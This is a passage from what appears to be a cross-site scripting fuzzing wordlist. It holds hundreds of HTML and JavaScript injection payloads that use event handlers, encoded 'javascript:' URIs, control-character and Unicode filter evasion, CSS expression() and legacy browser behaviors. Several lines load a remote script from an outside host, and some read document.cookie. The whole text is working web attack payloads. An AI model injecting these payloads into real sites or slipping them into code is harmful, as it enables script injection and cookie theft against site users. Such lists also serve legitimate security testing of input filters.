onload="javascript:javascript:alert(1)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> \x3Cscript>javascript:alert(1)</script> '"`><script>/* *\x2Fjavascript:alert(1)// */</script> <script>javascript:alert(1)</script\x0D <script>javascript:alert(1)</script\x0A <script>javascript:alert(1)</script\x0B <script charset="\x22>javascript:alert(1)</script> <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> `"'><img src='#\x27 onerror=javascript:alert(1)> <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> <script>/* *\x2A/javascript:alert(1)// */</script> <script>/* *\x00/javascript:alert(1)// */</script> <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> <script src="data:text/plain\x2Cjavascript:alert(1)"></script> <script src="data:\xD4\x8F,javascript:alert(1)"></script> <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> <script src="data:\xCB\x8F,javascript:alert(1)"></script> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF ABC<div style="x:expression\x5C(javascript:alert(1)">DEF ABC<div style="x:expression\x00(javascript:alert(1)">DEF ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x09expression(javascript:alert(1)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF ABC<div style="x:\x20expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF ABC<div style="x:\x00expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> `"'><img src=xxx:x \x22onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> `"'><img src=xxx:x \x09onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> `"'><img src=xxx:x \x00onerror=javascript:alert(1)> `"'><img src=xxx:x \x27onerror=javascript:alert(1)> `"'><img src=xxx:x \x20onerror=javascript:alert(1)> "`'><script>\x3Bjavascript:alert(1)</script> "`'><script>\x0Djavascript:alert(1)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "`'><script>\xE2\x80\x81javascript:alert(1)</script> "`'><script>\xE2\x80\x84javascript:alert(1)</script> "`'><script>\xE3\x80\x80javascript:alert(1)</script> "`'><script>\x09javascript:alert(1)</script> "`'><script>\xE2\x80\x89javascript:alert(1)</script> "`'><script>\xE2\x80\x85javascript:alert(1)</script> "`'><script>\xE2\x80\x88javascript:alert(1)</script> "`'><script>\x00javascript:alert(1)</script> "`'><script>\xE2\x80\xA8javascript:alert(1)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "`'><script>\xE1\x9A\x80javascript:alert(1)</script> "`'><script>\x0Cjavascript:alert(1)</script> "`'><script>\x2Bjavascript:alert(1)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "`'><script>-javascript:alert(1)</script> "`'><script>\x0Ajavascript:alert(1)</script> "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> "`'><script>\x7Ejavascript:alert(1)</script> "`'><script>\xE2\x80\x87javascript:alert(1)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "`'><script>\xE2\x80\xA9javascript:alert(1)</script> "`'><script>\xC2\x85javascript:alert(1)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> "`'><script>\xE2\x80\x83javascript:alert(1)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "`'><script>\xE2\x80\x80javascript:alert(1)</script> "`'><script>\x21javascript:alert(1)</script> "`'><script>\xE2\x80\x82javascript:alert(1)</script> "`'><script>\xE2\x80\x86javascript:alert(1)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> "`'><script>\x0Bjavascript:alert(1)</script> "`'><script>\x20javascript:alert(1)</script> "`'><script>\xC2\xA0javascript:alert(1)</script> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> <script\x2F>javascript:alert(1)</script> <script\x20>javascript:alert(1)</script> <script\x0D>javascript:alert(1)</script> <script\x0A>javascript:alert(1)</script> <script\x0C>javascript:alert(1)</script> <script\x00>javascript:alert(1)</script> <script\x09>javascript:alert(1)</script> `"'><img src=xxx:x onerror\x0B=javascript:alert(1)> `"'><img src=xxx:x onerror\x00=javascript:alert(1)> `"'><img src=xxx:x onerror\x0C=javascript:alert(1)> `"'><img src=xxx:x onerror\x0D=javascript:alert(1)> `"'><img src=xxx:x onerror\x20=javascript:alert(1)> `"'><img src=xxx:x onerror\x0A=javascript:alert(1)> `"'><img src=xxx:x onerror\x09=javascript:alert(1)> <script>javascript:alert(1)<\x00/script> <img src=# onerror\x3D"javascript:alert(1)" > <input onfocus=javascript:alert(1) autofocus> <input onblur=javascript:alert(1) autofocus><input autofocus> <video poster=javascript:javascript:alert(1)// <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X <video><source onerror="javascript:javascript:alert(1)"> <video onerror="javascript:javascript:alert(1)"><source> <form><button formaction="javascript:javascript:alert(1)">X <body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> <frameset onload=javascript:alert(1)> <table background="javascript:javascript:alert(1)"> <!--<img src="--><img src=x onerror=javascript:alert(1)//"> <comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> <![><img src="]><img src=x onerror=javascript:alert(1)//"> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,%(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b <script>alert(1)</script>0 <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> <embed src="javascript:alert(1)"> <img src="javascript:alert(1)"> <image src="javascript:alert(1)"> <script src="javascript:alert(1)"> <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x <? foo="><script>javascript:alert(1)</script>"> <! foo="><script>javascript:alert(1)</script>"> </ foo="><script>javascript:alert(1)</script>"> <? foo="><x foo='?><script>javascript:alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> <% foo><x foo="%><script>javascript:alert(1)</script>"> <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> <img \x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(1)"> <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> <img src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"= alt=javascript:alert(1)//"> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script --> <!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X <div style="font-family:'foo&#10;;color:red;';">XXX <div style="font-family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29> <style>*{x:expression(javascript:alert(1))}</style> <div style=content:url(%(svg)s)></div> <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> <x style="background:url('x&#1;;color:red;/*')">XXX</x> <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> <x style="behavior:url(%(sct)s)"> <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> <event-source src="%(event)s" onload="javascript:alert(1)"> <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> <script>%(payload)s</script> <script src=%(jscript)s></script> <script language='javascript' src='%(jscript)s'></script> <script>javascript:alert(1)</script> <IMG SRC="javascript:javascript:alert(1);"> <IMG SRC=javascript:javascript:alert(1)> <IMG SRC=`javascript:javascript:alert(1)`> <SCRIPT SRC=%(jscript)s?<B> <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> <BODY ONLOAD=javascript:alert(1)> <BODY ONLOAD=javascript:javascript:alert(1)> <IMG SRC="jav ascript:javascript:alert(1);"> <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> <SCRIPT/SRC="%(jscript)s"></SCRIPT> <<SCRIPT>%(payload)s//<</SCRIPT> <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> <IMG DYNSRC="javascript:javascript:alert(1)"> <IMG LOWSRC="javascript:javascript:alert(1)"> <BGSOUND SRC="javascript:javascript:alert(1);"> <BR SIZE="&{javascript:alert(1)}"> <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <XSS STYLE="behavior: url(%(htc)s);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(1)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> <DIV STYLE="background-image: url(javascript:javascript:alert(1))"> <DIV STYLE="width:expression(javascript:alert(1));"> <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> <XSS STYLE="xss:expression(javascript:alert(1))"> <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> <BASE HREF="javascript:javascript:alert(1);//"> <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> <SCRIPT SRC="%(jpg)s"></SCRIPT> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(1);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(1);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(1)></frameset> <object onerror=javascript:javascript:alert(1)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> <IMG SRC=&{javascript:alert(1);};> <a href="jav&#65ascript:javascript:alert(1)">test1</a> <a href="jav&#97ascript:javascript:alert(1)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY 